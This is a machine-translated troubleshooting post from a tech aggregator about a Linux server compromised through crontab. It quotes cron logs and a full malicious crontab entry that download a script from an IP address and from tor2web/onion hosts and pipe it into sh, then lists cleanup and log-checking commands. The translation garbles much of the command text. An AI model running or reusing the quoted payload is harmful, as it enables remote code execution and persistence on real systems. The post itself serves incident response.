Server crontab exception, suspected gongjiCPU exception 02/27 Update SLTechnology News&Howtos

Server crontab exception, suspected gongjiCPU exception

2025-02-27 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >

Shulou(Shulou.com)06/03 Report--

Phenomenon:

Installation was successful.

But it wasn't long before he came in again.

And has logged in to the system so far.

[root@izd7oc0a0u64q75bim8bu8z ~] # tail / var/log/cron

\ Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond [3209]: (cd) ERROR (getpwnam () failed)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond [3209]: (cd) ERROR (getpwnam () failed)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond [3209]: (cur) ERROR (getpwnam () failed)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND [5724]: (root) CMD (echo > > / home/test.txt)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND [5723]: (nobody) CMD (cur-fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh | sh)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND [5726]: (nginx) CMD (cur-fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh | sh)

Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND [5725]: (apache) CMD (cur-fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh | sh)

Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND [5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)

Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND [5718]: (nobody) MAIL (mailed 32 byte

[root@izd7oc0a0u64q75bim8bu8z tmp] # cat / etc/crontab

/ 13 root Renewal $(shuf-I 1-29-n 1); sleep ${RVV yes 0}; BP=$ (dirname "$(command-v yes)"); BP=$ {BP:- "/ usr/bin"}; G1 = "curl"; if [$(curl-version 2 > / dev/null | grep "curl" | wc-l)-eq 0]; then G1 = "echo"; for f in ${BP} /; do strings $f 2 > / dev/null | grep-Q "CURLOPT_VERBOSE" & & G1 = "$f" & & break;done;fi G2 = "wget"; if [$(wget-version 2 > / dev/null | grep "wgetrc" | wc-l)-eq 0]; then G2 = "echo"; for f in ${BP} / *; do strings $f 2 > / dev/null | grep-Q "to" & & G2 = "$f" & break;done;fi;if [$(cat / etc/hosts | grep-I "onion. | timesync.su | tor2web" | wc-l)-ne 0]; then echo "127.0.0.1 localhost" > / etc/hosts > / dev/null 2 > & 1fi C = "- fsSLk-- connect-timeout 26-- max-time 75"; W = "--quiet-- tries=1-- no-check-certificate-- connect-timeout=26-- timeout=75"; H = "https://7xffbbbebumizpeg";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm2";($G1 $C $H$T1 $P | | $G1 $C $H$T2 $P | | $G1 $C $H$T3 $P | | $G2 $W $H$T1 $P | | $G2 $W $H$T2 $P | | $G2 $W $H$T3 $P) | sh &

Every minute nobody nginx apache users execute a download script to run

Kill the script, then stop the crond service and there is no exception to download the script in the var/log/cronrizhikli log.

And this anomaly.

Found that there are also users here.

Once crontab is opened, it has been downloaded and executed once a minute.

Guoran decisively deleted apache and nobody and only nginx was left to download, but crontab-l didn't find anything unusual.

Finally find the location of the malicious user

Just delete it all and leave only root back to normal at last.

In the future, we should focus on the users who log in to the system.

More / var/log/secure | grep Accepted

Query frequent login users

Awk'/ Failed password/ {print $(NF-3)}'/ var/log/secure | sort-n | uniq-c | sort-n | tail

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.